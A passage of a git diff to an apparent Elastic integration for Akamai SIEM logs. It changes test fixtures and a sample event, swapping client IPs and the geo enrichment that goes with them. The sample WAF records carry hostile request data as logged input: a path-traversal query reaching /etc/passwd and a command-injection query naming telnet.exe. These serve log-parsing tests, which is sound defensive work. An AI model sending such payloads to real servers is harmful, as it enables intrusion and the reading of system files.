{"format":"json","type":"akamai_siem","version":"1.0","attackData":{"clientIP":"89.160.20.156","configId":"6724","policyId":"scoe_5426","ruleActions":"QUxFUlQ;REVOWQ==","ruleData":"YWxlcnQo;Y3VybA==","ruleMessages":"Q3Jvc3Mtc2l0ZSBTY3 JpcHRpbmcgKFhTUykgQXR0YWNr; UmVxdWVzdCBJbmRpY2F0ZXMgYW4 gYXV0b21hdGVkIHByb2 dyYW0gZXhwbG9yZWQgdGhlIHNpdGU=","ruleSelectors":"QVJHUzph;UkVRVUVTVF9IRU FERVJTOlVzZXItQWdlbnQ=","ruleTags":"V0VCX0FUVEFDSy9YU1M=;QV VUT01BVElPTi9NSVND","ruleVersions":";","rules":"OTUwMDA0;OTkwMDEx"},"geo":{"asn":"12271","city":"NEWYORK","continent":"NA","country":"US","regionCode":"NY"},"httpMessage":{"bytes":"34523","host":"www.example.com","method":"POST","path":"/examples/1/","port":"80","protocol":"http/2","query":"a%3D..%2F..%2F..%2Fetc%2Fpasswd","requestHeaders":"User-Agent%3a%20BOT%2f0.1%20(BOT%20for%20JCE)%0d%0aAccept%3a%20text%2fhtml,application%2fxhtml+xml","requestId":"2ab418ac8515f33","responseHeaders":"Server%3a%20AkamaiGHost%0d%0aMime-Version%3a%201.0%0d%0aContent-Type%3a%20text%2fhtml","start":"1470923133.026","status":"301","tls": "TLSv1.2"},"userRiskData":{"uuid":"964d54b7-0821-413a-a4d6-8131770ec8d5","status":"0","score":"75","risk":"udfp:1325gdg4g4343g/M|unp:74256/H","trust":"ugp:US","general":"duc_1h:10|duc_1d:30","allow":"0"},"clientData":{"appBundleId":"com.mydomain.myapp","appVersion":"1.23","sdkVersion":"4.7.1","telemetryType":"2"},"botData":{"botScore":"100","responseSegment":"3"}} {"total":3,"offset":"abcd","limit":3} diff --git a/packages/akamai/data_stream/siem/_dev/test/pipeline/test-http-json.log b/packages/akamai/data_stream/siem/_dev/test/pipeline/test-http-json.log index 116fc6180a1..838d5e98cff 100644 --- a/packages/akamai/data_stream/siem/_dev/test/pipeline/test-http-json.log +++ b/packages/akamai/data_stream/siem/_dev/test/pipeline/test-http-json.log @@ -1,3 +1,3 @@ -{"format":"json","type":"akamai_siem","version":"1.0","attackData":{"clientIP":"52.91.36.10","configId":"14227","policyId":"qik1_26545","ruleActions":"YWxlcnQ%3d%3bYWxlcnQ%3d%3bZGVueQ%3d%3d","ruleData":"dGVsbmV0LmV4ZQ%3d%3d%3bdGVsbmV0LmV4ZQ%3d%3d%3bVmVjdG9yIFNjb3JlOiAxMCwgREVOWSB0aHJlc2hvbGQ6IDksIEFsZX ","ruleMessages":"U3lzdGVtIENvbW1hbmQgQWNjZXNz%3bU3lzdGVtIENvbW1hbmQgSW5qZWN0aW9u%3bQW5vbWFseSBTY29yZSBFeGNlZWRlZCBmb3 ","ruleSelectors":"QVJHUzpvcHRpb24%3d%3bQVJHUzpvcHRpb24%3d%3b","ruleTags":"T1dBU1BfQ1JTL1dFQl9BVFRBQ0svRklMRV9JTkpFQ1RJT04%3d%3bT1dBU1BfQ1JTL1dFQl9BVFRBQ0svQ09NTUFORF9JTkpFQ1R ","ruleVersions":"NA%3d%3d%3bNA%3d%3d%3bMQ%3d%3d","rules":"OTUwMDAy%3bOTUwMDA2%3bQ01ELUlOSkVDVElPTi1BTk9NQUxZ"},"geo":{"asn":"14618","city":"ASHBURN","continent":"288","country":"US","regionCode":"VA"},"httpMessage":{"bytes":"266","host":"www.hmapi.com","method":"GET","path":"/","port":"80","protocol":"HTTP/1.1","query":"option=com_jce%20telnet.exe","requestHeaders":"User-Agent%3a%20BOT%2f0.1%20(BOT%20for%20JCE)%0d%0aAccept%3a%20text%2fhtml,application%2fxhtml+xml","requestId":"1158db1758e37bfe67b7c09","responseHeaders":"Server%3a%20AkamaiGHost%0d%0aMime-Version%3a%201.0%0d%0aContent-Type%3a%20text%2fhtml%0d%0aContent-Length%3a%20150","start":"1491303422","status":"200"},"userRiskData":{"uuid":"964d54b7-0821-413a-a4d6-8131770ec8d5","status":"0","score":"75","risk":"udfp:1325gdg4g4343g/M|unp:74256/H","trust":"ugp:US","general":"duc_1h:10|duc_1d:30","allow":"0"},"clientData":{"appBundleId":"com.mydomain.myapp","appVersion":"1.23","sdkVersion":"4.7.1","telemetryType":"2"},"botData":{"botScore":"100","responseSegment":"3"}} -{"format":"json","type":"akamai_siem","version":"1.0","attackData":{"clientIP":"52.91.36.10","configId":"6724","policyId":"scoe_5426","ruleActions":"QUxFUlQ;REVOWQ==","ruleData":"YWxlcnQo;Y3VybA==","ruleMessages":"Q3Jvc3Mtc2l0ZSBTY3 JpcHRpbmcgKFhTUykgQXR0YWNr; UmVxdWVzdCBJbmRpY2F0ZXMgYW4 gYXV0b21hdGVkIHByb2 dyYW0gZXhwbG9yZWQgdGhlIHNpdGU=","ruleSelectors":"QVJHUzph;UkVRVUVTVF9IRU FERVJTOlVzZXItQWdlbnQ=","ruleTags":"V0VCX0FUVEFDSy9YU1M=;QV VUT01BVElPTi9NSVND","ruleVersions":";","rules":"OTUwMDA0;OTkwMDEx"},"geo":{"asn":"12271","city":"NEWYORK","continent":"NA","country":"US","regionCode":"NY"},"httpMessage":{"bytes":"34523","host":"www.example.com","method":"POST","path":"/examples/1/","port":"80","protocol":"http/2","query":"a%3D..%2F..%2F..%2Fetc%2Fpasswd","requestHeaders":"User-Agent%3a%20BOT%2f0.1%20(BOT%20for%20JCE)%0d%0aAccept%3a%20text%2fhtml,application%2fxhtml+xml","requestId":"2ab418ac8515f33","responseHeaders":"Server%3a%20AkamaiGHost%0d%0aMime-Version%3a%201.0%0d%0aContent-Type%3a%20text%2fhtml","start":"1470923133.026","status":"301","tls": "TLSv1.2"},"userRiskData":{"uuid":"964d54b7-0821-413a-a4d6-8131770ec8d5","status":"0","score":"75","risk":"udfp:1325gdg4g4343g/M|unp:74256/H","trust":"ugp:US","general":"duc_1h:10|duc_1d:30","allow":"0"},"clientData":{"appBundleId":"com.mydomain.myapp","appVersion":"1.23","sdkVersion":"4.7.1","telemetryType":"2"},"botData":{"botScore":"100","responseSegment":"3"}} +{"format":"json","type":"akamai_siem","version":"1.0","attackData":{"clientIP":"89.160.20.156","configId":"14227","policyId":"qik1_26545","ruleActions":"YWxlcnQ%3d%3bYWxlcnQ%3d%3bZGVueQ%3d%3d","ruleData":"dGVsbmV0LmV4ZQ%3d%3d%3bdGVsbmV0LmV4ZQ%3d%3d%3bVmVjdG9yIFNjb3JlOiAxMCwgREVOWSB0aHJlc2hvbGQ6IDksIEFsZX ","ruleMessages":"U3lzdGVtIENvbW1hbmQgQWNjZXNz%3bU3lzdGVtIENvbW1hbmQgSW5qZWN0aW9u%3bQW5vbWFseSBTY29yZSBFeGNlZWRlZCBmb3 ","ruleSelectors":"QVJHUzpvcHRpb24%3d%3bQVJHUzpvcHRpb24%3d%3b","ruleTags":"T1dBU1BfQ1JTL1dFQl9BVFRBQ0svRklMRV9JTkpFQ1RJT04%3d%3bT1dBU1BfQ1JTL1dFQl9BVFRBQ0svQ09NTUFORF9JTkpFQ1R ","ruleVersions":"NA%3d%3d%3bNA%3d%3d%3bMQ%3d%3d","rules":"OTUwMDAy%3bOTUwMDA2%3bQ01ELUlOSkVDVElPTi1BTk9NQUxZ"},"geo":{"asn":"14618","city":"ASHBURN","continent":"288","country":"US","regionCode":"VA"},"httpMessage":{"bytes":"266","host":"www.hmapi.com","method":"GET","path":"/","port":"80","protocol":"HTTP/1.1","query":"option=com_jce%20telnet.exe","requestHeaders":"User-Agent%3a%20BOT%2f0.1%20(BOT%20for%20JCE)%0d%0aAccept%3a%20text%2fhtml,application%2fxhtml+xml","requestId":"1158db1758e37bfe67b7c09","responseHeaders":"Server%3a%20AkamaiGHost%0d%0aMime-Version%3a%201.0%0d%0aContent-Type%3a%20text%2fhtml%0d%0aContent-Length%3a%20150","start":"1491303422","status":"200"},"userRiskData":{"uuid":"964d54b7-0821-413a-a4d6-8131770ec8d5","status":"0","score":"75","risk":"udfp:1325gdg4g4343g/M|unp:74256/H","trust":"ugp:US","general":"duc_1h:10|duc_1d:30","allow":"0"},"clientData":{"appBundleId":"com.mydomain.myapp","appVersion":"1.23","sdkVersion":"4.7.1","telemetryType":"2"},"botData":{"botScore":"100","responseSegment":"3"}} +{"format":"json","type":"akamai_siem","version":"1.0","attackData":{"clientIP":"89.160.20.156","configId":"6724","policyId":"scoe_5426","ruleActions":"QUxFUlQ;REVOWQ==","ruleData":"YWxlcnQo;Y3VybA==","ruleMessages":"Q3Jvc3Mtc2l0ZSBTY3 JpcHRpbmcgKFhTUykgQXR0YWNr; UmVxdWVzdCBJbmRpY2F0ZXMgYW4 gYXV0b21hdGVkIHByb2 dyYW0gZXhwbG9yZWQgdGhlIHNpdGU=","ruleSelectors":"QVJHUzph;UkVRVUVTVF9IRU FERVJTOlVzZXItQWdlbnQ=","ruleTags":"V0VCX0FUVEFDSy9YU1M=;QV VUT01BVElPTi9NSVND","ruleVersions":";","rules":"OTUwMDA0;OTkwMDEx"},"geo":{"asn":"12271","city":"NEWYORK","continent":"NA","country":"US","regionCode":"NY"},"httpMessage":{"bytes":"34523","host":"www.example.com","method":"POST","path":"/examples/1/","port":"80","protocol":"http/2","query":"a%3D..%2F..%2F..%2Fetc%2Fpasswd","requestHeaders":"User-Agent%3a%20BOT%2f0.1%20(BOT%20for%20JCE)%0d%0aAccept%3a%20text%2fhtml,application%2fxhtml+xml","requestId":"2ab418ac8515f33","responseHeaders":"Server%3a%20AkamaiGHost%0d%0aMime-Version%3a%201.0%0d%0aContent-Type%3a%20text%2fhtml","start":"1470923133.026","status":"301","tls": "TLSv1.2"},"userRiskData":{"uuid":"964d54b7-0821-413a-a4d6-8131770ec8d5","status":"0","score":"75","risk":"udfp:1325gdg4g4343g/M|unp:74256/H","trust":"ugp:US","general":"duc_1h:10|duc_1d:30","allow":"0"},"clientData":{"appBundleId":"com.mydomain.myapp","appVersion":"1.23","sdkVersion":"4.7.1","telemetryType":"2"},"botData":{"botScore":"100","responseSegment":"3"}} {"total":10000,"offset":"71cca;3phZmEdPj6YEqml0rvbdWDZGW3mCiJIwjyhkJfsLFM2gVYPgE8-N_0CiLI9gwH0_4OJ87xDQ3b-gIsx_kEBdf7aaC_AvDpG9fMxypeaCma10FKrY9VKE","limit":10000} \ No newline at end of file diff --git a/packages/akamai/data_stream/siem/_dev/test/pipeline/test-http-json.log-expected.json b/packages/akamai/data_stream/siem/_dev/test/pipeline/test-http-json.log-expected.json index 62a0e30999d..826f3717bd4 100644 --- a/packages/akamai/data_stream/siem/_dev/test/pipeline/test-http-json.log-expected.json +++ b/packages/akamai/data_stream/siem/_dev/test/pipeline/test-http-json.log-expected.json @@ -77,25 +77,25 @@ }, "source": { "geo": { - "continent_name": "North America", - "region_iso_code": "US-VA", - "city_name": "Ashburn", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Virginia", + "continent_name": "Europe", + "region_iso_code": "SE-E", + "city_name": "Linköping", + "country_iso_code": "SE", + "country_name": "Sweden", + "region_name": "Östergötland County", "location": { - "lon": -77.4728, - "lat": 39.0481 + "lon": 15.6167, + "lat": 58.4167 } }, "as": { - "number": 14618, + "number": 29518, "organization": { - "name": "Amazon.com, Inc." + "name": "Bredband2 AB" } }, - "address": "52.91.36.10", - "ip": "52.91.36.10" + "address": "89.160.20.156", + "ip": "89.160.20.156" }, "url": { "path": "/", @@ -121,7 +121,7 @@ }, "related": { "ip": [ - "52.91.36.10" + "89.160.20.156" ] }, "http": { @@ -137,30 +137,30 @@ }, "client": { "geo": { - "continent_name": "North America", - "region_iso_code": "US-VA", - "city_name": "Ashburn", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Virginia", + "continent_name": "Europe", + "region_iso_code": "SE-E", + "city_name": "Linköping", + "country_iso_code": "SE", + "country_name": "Sweden", + "region_name": "Östergötland County", "location": { - "lon": -77.4728, - "lat": 39.0481 + "lon": 15.6167, + "lat": 58.4167 } }, "as": { - "number": 14618, + "number": 29518, "organization": { - "name": "Amazon.com, Inc." + "name": "Bredband2 AB" } }, - "address": "52.91.36.10", - "ip": "52.91.36.10" + "address": "89.160.20.156", + "ip": "89.160.20.156" }, "event": { "start": "2017-04-04T10:57:02.000Z", - "ingested": "2021-12-08T14:29:59.364478822Z", - "original": "{\"format\":\"json\",\"type\":\"akamai_siem\",\"version\":\"1.0\",\"attackData\":{\"clientIP\":\"52.91.36.10\",\"configId\":\"14227\",\"policyId\":\"qik1_26545\",\"ruleActions\":\"YWxlcnQ%3d%3bYWxlcnQ%3d%3bZGVueQ%3d%3d\",\"ruleData\":\"dGVsbmV0LmV4ZQ%3d%3d%3bdGVsbmV0LmV4ZQ%3d%3d%3bVmVjdG9yIFNjb3JlOiAxMCwgREVOWSB0aHJlc2hvbGQ6IDksIEFsZX \",\"ruleMessages\":\"U3lzdGVtIENvbW1hbmQgQWNjZXNz%3bU3lzdGVtIENvbW1hbmQgSW5qZWN0aW9u%3bQW5vbWFseSBTY29yZSBFeGNlZWRlZCBmb3 \",\"ruleSelectors\":\"QVJHUzpvcHRpb24%3d%3bQVJHUzpvcHRpb24%3d%3b\",\"ruleTags\":\"T1dBU1BfQ1JTL1dFQl9BVFRBQ0svRklMRV9JTkpFQ1RJT04%3d%3bT1dBU1BfQ1JTL1dFQl9BVFRBQ0svQ09NTUFORF9JTkpFQ1R \",\"ruleVersions\":\"NA%3d%3d%3bNA%3d%3d%3bMQ%3d%3d\",\"rules\":\"OTUwMDAy%3bOTUwMDA2%3bQ01ELUlOSkVDVElPTi1BTk9NQUxZ\"},\"geo\":{\"asn\":\"14618\",\"city\":\"ASHBURN\",\"continent\":\"288\",\"country\":\"US\",\"regionCode\":\"VA\"},\"httpMessage\":{\"bytes\":\"266\",\"host\":\"www.hmapi.com\",\"method\":\"GET\",\"path\":\"/\",\"port\":\"80\",\"protocol\":\"HTTP/1.1\",\"query\":\"option=com_jce%20telnet.exe\",\"requestHeaders\":\"User-Agent%3a%20BOT%2f0.1%20(BOT%20for%20JCE)%0d%0aAccept%3a%20text%2fhtml,application%2fxhtml+xml\",\"requestId\":\"1158db1758e37bfe67b7c09\",\"responseHeaders\":\"Server%3a%20AkamaiGHost%0d%0aMime-Version%3a%201.0%0d%0aContent-Type%3a%20text%2fhtml%0d%0aContent-Length%3a%20150\",\"start\":\"1491303422\",\"status\":\"200\"},\"userRiskData\":{\"uuid\":\"964d54b7-0821-413a-a4d6-8131770ec8d5\",\"status\":\"0\",\"score\":\"75\",\"risk\":\"udfp:1325gdg4g4343g/M|unp:74256/H\",\"trust\":\"ugp:US\",\"general\":\"duc_1h:10|duc_1d:30\",\"allow\":\"0\"},\"clientData\":{\"appBundleId\":\"com.mydomain.myapp\",\"appVersion\":\"1.23\",\"sdkVersion\":\"4.7.1\",\"telemetryType\":\"2\"},\"botData\":{\"botScore\":\"100\",\"responseSegment\":\"3\"}}", + "ingested": "2021-12-15T09:37:55.215803315Z", + "original": "{\"format\":\"json\",\"type\":\"akamai_siem\",\"version\":\"1.0\",\"attackData\":{\"clientIP\":\"89.160.20.156\",\"configId\":\"14227\",\"policyId\":\"qik1_26545\",\"ruleActions\":\"YWxlcnQ%3d%3bYWxlcnQ%3d%3bZGVueQ%3d%3d\",\"ruleData\":\"dGVsbmV0LmV4ZQ%3d%3d%3bdGVsbmV0LmV4ZQ%3d%3d%3bVmVjdG9yIFNjb3JlOiAxMCwgREVOWSB0aHJlc2hvbGQ6IDksIEFsZX \",\"ruleMessages\":\"U3lzdGVtIENvbW1hbmQgQWNjZXNz%3bU3lzdGVtIENvbW1hbmQgSW5qZWN0aW9u%3bQW5vbWFseSBTY29yZSBFeGNlZWRlZCBmb3 \",\"ruleSelectors\":\"QVJHUzpvcHRpb24%3d%3bQVJHUzpvcHRpb24%3d%3b\",\"ruleTags\":\"T1dBU1BfQ1JTL1dFQl9BVFRBQ0svRklMRV9JTkpFQ1RJT04%3d%3bT1dBU1BfQ1JTL1dFQl9BVFRBQ0svQ09NTUFORF9JTkpFQ1R \",\"ruleVersions\":\"NA%3d%3d%3bNA%3d%3d%3bMQ%3d%3d\",\"rules\":\"OTUwMDAy%3bOTUwMDA2%3bQ01ELUlOSkVDVElPTi1BTk9NQUxZ\"},\"geo\":{\"asn\":\"14618\",\"city\":\"ASHBURN\",\"continent\":\"288\",\"country\":\"US\",\"regionCode\":\"VA\"},\"httpMessage\":{\"bytes\":\"266\",\"host\":\"www.hmapi.com\",\"method\":\"GET\",\"path\":\"/\",\"port\":\"80\",\"protocol\":\"HTTP/1.1\",\"query\":\"option=com_jce%20telnet.exe\",\"requestHeaders\":\"User-Agent%3a%20BOT%2f0.1%20(BOT%20for%20JCE)%0d%0aAccept%3a%20text%2fhtml,application%2fxhtml+xml\",\"requestId\":\"1158db1758e37bfe67b7c09\",\"responseHeaders\":\"Server%3a%20AkamaiGHost%0d%0aMime-Version%3a%201.0%0d%0aContent-Type%3a%20text%2fhtml%0d%0aContent-Length%3a%20150\",\"start\":\"1491303422\",\"status\":\"200\"},\"userRiskData\":{\"uuid\":\"964d54b7-0821-413a-a4d6-8131770ec8d5\",\"status\":\"0\",\"score\":\"75\",\"risk\":\"udfp:1325gdg4g4343g/M|unp:74256/H\",\"trust\":\"ugp:US\",\"general\":\"duc_1h:10|duc_1d:30\",\"allow\":\"0\"},\"clientData\":{\"appBundleId\":\"com.mydomain.myapp\",\"appVersion\":\"1.23\",\"sdkVersion\":\"4.7.1\",\"telemetryType\":\"2\"},\"botData\":{\"botScore\":\"100\",\"responseSegment\":\"3\"}}", "id": "1158db1758e37bfe67b7c09", "category": "network", "kind": "event" @@ -233,25 +233,25 @@ }, "source": { "geo": { - "continent_name": "North America", - "region_iso_code": "US-VA", - "city_name": "Ashburn", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Virginia", + "continent_name": "Europe", + "region_iso_code": "SE-E", + "city_name": "Linköping", + "country_iso_code": "SE", + "country_name": "Sweden", + "region_name": "Östergötland County", "location": { - "lon": -77.4728, - "lat": 39.0481 + "lon": 15.6167, + "lat": 58.4167 } }, "as": { - "number": 14618, + "number": 29518, "organization": { - "name": "Amazon.com, Inc." + "name": "Bredband2 AB" } }, - "address": "52.91.36.10", - "ip": "52.91.36.10" + "address": "89.160.20.156", + "ip": "89.160.20.156" }, "url": { "path": "/examples/1/", @@ -277,7 +277,7 @@ }, "related": { "ip": [ - "52.91.36.10" + "89.160.20.156" ] }, "http": { @@ -293,25 +293,25 @@ }, "client": { "geo": { - "continent_name": "North America", - "region_iso_code": "US-VA", - "city_name": "Ashburn", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Virginia", + "continent_name": "Europe", + "region_iso_code": "SE-E", + "city_name": "Linköping", + "country_iso_code": "SE", + "country_name": "Sweden", + "region_name": "Östergötland County", "location": { - "lon": -77.4728, - "lat": 39.0481 + "lon": 15.6167, + "lat": 58.4167 } }, "as": { - "number": 14618, + "number": 29518, "organization": { - "name": "Amazon.com, Inc." + "name": "Bredband2 AB" } }, - "address": "52.91.36.10", - "ip": "52.91.36.10" + "address": "89.160.20.156", + "ip": "89.160.20.156" }, "tls": { "version": "1.2", @@ -319,8 +319,8 @@ }, "event": { "start": "2016-08-11T13:45:33.026Z", - "ingested": "2021-12-08T14:29:59.364485040Z", - "original": "{\"format\":\"json\",\"type\":\"akamai_siem\",\"version\":\"1.0\",\"attackData\":{\"clientIP\":\"52.91.36.10\",\"configId\":\"6724\",\"policyId\":\"scoe_5426\",\"ruleActions\":\"QUxFUlQ;REVOWQ==\",\"ruleData\":\"YWxlcnQo;Y3VybA==\",\"ruleMessages\":\"Q3Jvc3Mtc2l0ZSBTY3 JpcHRpbmcgKFhTUykgQXR0YWNr; UmVxdWVzdCBJbmRpY2F0ZXMgYW4 gYXV0b21hdGVkIHByb2 dyYW0gZXhwbG9yZWQgdGhlIHNpdGU=\",\"ruleSelectors\":\"QVJHUzph;UkVRVUVTVF9IRU FERVJTOlVzZXItQWdlbnQ=\",\"ruleTags\":\"V0VCX0FUVEFDSy9YU1M=;QV VUT01BVElPTi9NSVND\",\"ruleVersions\":\";\",\"rules\":\"OTUwMDA0;OTkwMDEx\"},\"geo\":{\"asn\":\"12271\",\"city\":\"NEWYORK\",\"continent\":\"NA\",\"country\":\"US\",\"regionCode\":\"NY\"},\"httpMessage\":{\"bytes\":\"34523\",\"host\":\"www.example.com\",\"method\":\"POST\",\"path\":\"/examples/1/\",\"port\":\"80\",\"protocol\":\"http/2\",\"query\":\"a%3D..%2F..%2F..%2Fetc%2Fpasswd\",\"requestHeaders\":\"User-Agent%3a%20BOT%2f0.1%20(BOT%20for%20JCE)%0d%0aAccept%3a%20text%2fhtml,application%2fxhtml+xml\",\"requestId\":\"2ab418ac8515f33\",\"responseHeaders\":\"Server%3a%20AkamaiGHost%0d%0aMime-Version%3a%201.0%0d%0aContent-Type%3a%20text%2fhtml\",\"start\":\"1470923133.026\",\"status\":\"301\",\"tls\": \"TLSv1.2\"},\"userRiskData\":{\"uuid\":\"964d54b7-0821-413a-a4d6-8131770ec8d5\",\"status\":\"0\",\"score\":\"75\",\"risk\":\"udfp:1325gdg4g4343g/M|unp:74256/H\",\"trust\":\"ugp:US\",\"general\":\"duc_1h:10|duc_1d:30\",\"allow\":\"0\"},\"clientData\":{\"appBundleId\":\"com.mydomain.myapp\",\"appVersion\":\"1.23\",\"sdkVersion\":\"4.7.1\",\"telemetryType\":\"2\"},\"botData\":{\"botScore\":\"100\",\"responseSegment\":\"3\"}}", + "ingested": "2021-12-15T09:37:55.215806647Z", + "original": "{\"format\":\"json\",\"type\":\"akamai_siem\",\"version\":\"1.0\",\"attackData\":{\"clientIP\":\"89.160.20.156\",\"configId\":\"6724\",\"policyId\":\"scoe_5426\",\"ruleActions\":\"QUxFUlQ;REVOWQ==\",\"ruleData\":\"YWxlcnQo;Y3VybA==\",\"ruleMessages\":\"Q3Jvc3Mtc2l0ZSBTY3 JpcHRpbmcgKFhTUykgQXR0YWNr; UmVxdWVzdCBJbmRpY2F0ZXMgYW4 gYXV0b21hdGVkIHByb2 dyYW0gZXhwbG9yZWQgdGhlIHNpdGU=\",\"ruleSelectors\":\"QVJHUzph;UkVRVUVTVF9IRU FERVJTOlVzZXItQWdlbnQ=\",\"ruleTags\":\"V0VCX0FUVEFDSy9YU1M=;QV VUT01BVElPTi9NSVND\",\"ruleVersions\":\";\",\"rules\":\"OTUwMDA0;OTkwMDEx\"},\"geo\":{\"asn\":\"12271\",\"city\":\"NEWYORK\",\"continent\":\"NA\",\"country\":\"US\",\"regionCode\":\"NY\"},\"httpMessage\":{\"bytes\":\"34523\",\"host\":\"www.example.com\",\"method\":\"POST\",\"path\":\"/examples/1/\",\"port\":\"80\",\"protocol\":\"http/2\",\"query\":\"a%3D..%2F..%2F..%2Fetc%2Fpasswd\",\"requestHeaders\":\"User-Agent%3a%20BOT%2f0.1%20(BOT%20for%20JCE)%0d%0aAccept%3a%20text%2fhtml,application%2fxhtml+xml\",\"requestId\":\"2ab418ac8515f33\",\"responseHeaders\":\"Server%3a%20AkamaiGHost%0d%0aMime-Version%3a%201.0%0d%0aContent-Type%3a%20text%2fhtml\",\"start\":\"1470923133.026\",\"status\":\"301\",\"tls\": \"TLSv1.2\"},\"userRiskData\":{\"uuid\":\"964d54b7-0821-413a-a4d6-8131770ec8d5\",\"status\":\"0\",\"score\":\"75\",\"risk\":\"udfp:1325gdg4g4343g/M|unp:74256/H\",\"trust\":\"ugp:US\",\"general\":\"duc_1h:10|duc_1d:30\",\"allow\":\"0\"},\"clientData\":{\"appBundleId\":\"com.mydomain.myapp\",\"appVersion\":\"1.23\",\"sdkVersion\":\"4.7.1\",\"telemetryType\":\"2\"},\"botData\":{\"botScore\":\"100\",\"responseSegment\":\"3\"}}", "id": "2ab418ac8515f33", "category": "network", "kind": "event" diff --git a/packages/akamai/data_stream/siem/sample_event.json b/packages/akamai/data_stream/siem/sample_event.json index 509feb14af8..31614bc2fa6 100644 --- a/packages/akamai/data_stream/siem/sample_event.json +++ b/packages/akamai/data_stream/siem/sample_event.json @@ -73,26 +73,26 @@ } }, "client": { - "address": "52.91.36.10", + "geo": { + "continent_name": "Europe", + "region_iso_code": "SE-E", + "city_name": "Linköping", + "country_iso_code": "SE", + "country_name": "Sweden", + "region_name": "Östergötland County", + "location": { + "lon": 15.6167, + "lat": 58.4167 + } + }, "as": { - "number": 14618, + "number": 29518, "organization": { - "name": "Amazon.com, Inc." + "name": "Bredband2 AB" } }, - "geo": { - "city_name": "Ashburn", - "continent_name": "North America", - "country_iso_code": "US", - "country_name": "United States", - "location": { - "lat": 39.0481, - "lon": -77.4728 - }, - "region_iso_code": "US-VA", - "region_name": "Virginia" - }, - "ip": "52.91.36.10" + "address": "89.160.20.156", + "ip": "89.160.20.156" }, "data_stream": { "dataset": "akamai.siem", @@ -115,7 +115,7 @@ "id": "2ab418ac8515f33", "ingested": "2021-12-08T14:30:40Z", "kind": "event", - "original": "{\"attackData\":{\"clientIP\":\"52.91.36.10\",\"configId\":\"6724\",\"policyId\":\"scoe_5426\",\"ruleActions\":\"QUxFUlQ;REVOWQ==\",\"ruleData\":\"YWxlcnQo;Y3VybA==\",\"ruleMessages\":\"Q3Jvc3Mtc2l0ZSBTY3 JpcHRpbmcgKFhTUykgQXR0YWNr; UmVxdWVzdCBJbmRpY2F0ZXMgYW4 gYXV0b21hdGVkIHByb2 dyYW0gZXhwbG9yZWQgdGhlIHNpdGU=\",\"ruleSelectors\":\"QVJHUzph;UkVRVUVTVF9IRU FERVJTOlVzZXItQWdlbnQ=\",\"ruleTags\":\"V0VCX0FUVEFDSy9YU1M=;QV VUT01BVElPTi9NSVND\",\"ruleVersions\":\";\",\"rules\":\"OTUwMDA0;OTkwMDEx\"},\"botData\":{\"botScore\":\"100\",\"responseSegment\":\"3\"},\"clientData\":{\"appBundleId\":\"com.mydomain.myapp\",\"appVersion\":\"1.23\",\"sdkVersion\":\"4.7.1\",\"telemetryType\":\"2\"},\"format\":\"json\",\"geo\":{\"asn\":\"12271\",\"city\":\"NEWYORK\",\"continent\":\"NA\",\"country\":\"US\",\"regionCode\":\"NY\"},\"httpMessage\":{\"bytes\":\"34523\",\"host\":\"www.example.com\",\"method\":\"POST\",\"path\":\"/examples/1/\",\"port\":\"80\",\"protocol\":\"http/2\",\"query\":\"a%3D..%2F..%2F..%2Fetc%2Fpasswd\",\"requestHeaders\":\"User-Agent%3a%20BOT%2f0.1%20(BOT%20for%20JCE)%0d%0aAccept%3a%20text%2fhtml,application%2fxhtml+xml\",\"requestId\":\"2ab418ac8515f33\",\"responseHeaders\":\"Server%3a%20AkamaiGHost%0d%0aMime-Version%3a%201.0%0d%0aContent-Type%3a%20text%2fhtml\",\"start\":\"1470923133.026\",\"status\":\"301\",\"tls\":\"TLSv1.2\"},\"type\":\"akamai_siem\",\"userRiskData\":{\"allow\":\"0\",\"general\":\"duc_1h:10|duc_1d:30\",\"risk\":\"udfp:1325gdg4g4343g/M|unp:74256/H\",\"score\":\"75\",\"status\":\"0\",\"trust\":\"ugp:US\",\"uuid\":\"964d54b7-0821-413a-a4d6-8131770ec8d5\"},\"version\":\"1.0\"}", + "original": "{\"attackData\":{\"clientIP\":\"89.160.20.156\",\"configId\":\"6724\",\"policyId\":\"scoe_5426\",\"ruleActions\":\"QUxFUlQ;REVOWQ==\",\"ruleData\":\"YWxlcnQo;Y3VybA==\",\"ruleMessages\":\"Q3Jvc3Mtc2l0ZSBTY3 JpcHRpbmcgKFhTUykgQXR0YWNr; UmVxdWVzdCBJbmRpY2F0ZXMgYW4 gYXV0b21hdGVkIHByb2 dyYW0gZXhwbG9yZWQgdGhlIHNpdGU=\",\"ruleSelectors\":\"QVJHUzph;UkVRVUVTVF9IRU FERVJTOlVzZXItQWdlbnQ=\",\"ruleTags\":\"V0VCX0FUVEFDSy9YU1M=;QV VUT01BVElPTi9NSVND\",\"ruleVersions\":\";\",\"rules\":\"OTUwMDA0;OTkwMDEx\"},\"botData\":{\"botScore\":\"100\",\"responseSegment\":\"3\"},\"clientData\":{\"appBundleId\":\"com.mydomain.myapp\",\"appVersion\":\"1.23\",\"sdkVersion\":\"4.7.1\",\"telemetryType\":\"2\"},\"format\":\"json\",\"geo\":{\"asn\":\"12271\",\"city\":\"NEWYORK\",\"continent\":\"NA\",\"country\":\"US\",\"regionCode\":\"NY\"},\"httpMessage\":{\"bytes\":\"34523\",\"host\":\"www.example.com\",\"method\":\"POST\",\"path\":\"/examples/1/\",\"port\":\"80\",\"protocol\":\"http/2\",\"query\":\"a%3D..%2F..%2F..%2Fetc%2Fpasswd\",\"requestHeaders\":\"User-Agent%3a%20BOT%2f0.1%20(BOT%20for%20JCE)%0d%0aAccept%3a%20text%2fhtml,application%2fxhtml+xml\",\"requestId\":\"2ab418ac8515f33\",\"responseHeaders\":\"Server%3a%20AkamaiGHost%0d%0aMime-Version%3a%201.0%0d%0aContent-Type%3a%20text%2fhtml\",\"start\":\"1470923133.026\",\"status\":\"301\",\"tls\":\"TLSv1.2\"},\"type\":\"akamai_siem\",\"userRiskData\":{\"allow\":\"0\",\"general\":\"duc_1h:10|duc_1d:30\",\"risk\":\"udfp:1325gdg4g4343g/M|unp:74256/H\",\"score\":\"75\",\"status\":\"0\",\"trust\":\"ugp:US\",\"uuid\":\"964d54b7-0821-413a-a4d6-8131770ec8d5\"},\"version\":\"1.0\"}", "start": "2016-08-11T13:45:33.026Z" }, "host": { @@ -145,30 +145,30 @@ }, "related": { "ip": [ - "52.91.36.10" + "89.160.20.156" ] }, "source": { - "address": "52.91.36.10", + "geo": { + "continent_name": "Europe", + "region_iso_code": "SE-E", + "city_name": 